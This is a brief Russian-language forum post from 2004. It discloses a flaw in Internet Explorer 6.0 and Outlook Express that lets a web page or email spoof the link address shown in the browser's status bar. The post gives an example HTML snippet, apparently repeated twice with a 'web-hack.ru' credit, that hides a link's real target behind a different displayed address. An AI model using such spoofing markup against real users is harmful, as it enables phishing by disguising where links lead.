Geser
06.11.2004, 12:50
Уязвимость может использоваться с целью подмены адреса в строке состояния IE. Обмануть жертву можно через специализированный HTML-код, в качестве примера которого приводят следующую строку. Брешь присутствует в Internet Explorer версии 6.0, а также почтовом клиенте Microsoft Outlook Express. Способов устранения дыры на сегодняшний день не существует.
<table><tr><td><a class=in target=_blank href="http://www.google.com/">Click here</td></tr></table> (http://www.microsoft.com/)
web-hack.ru
<table><tr><td><a class=in target=_blank href="http://www.google.com/">Click here</td></tr></table> (http://www.microsoft.com/)
web-hack.ru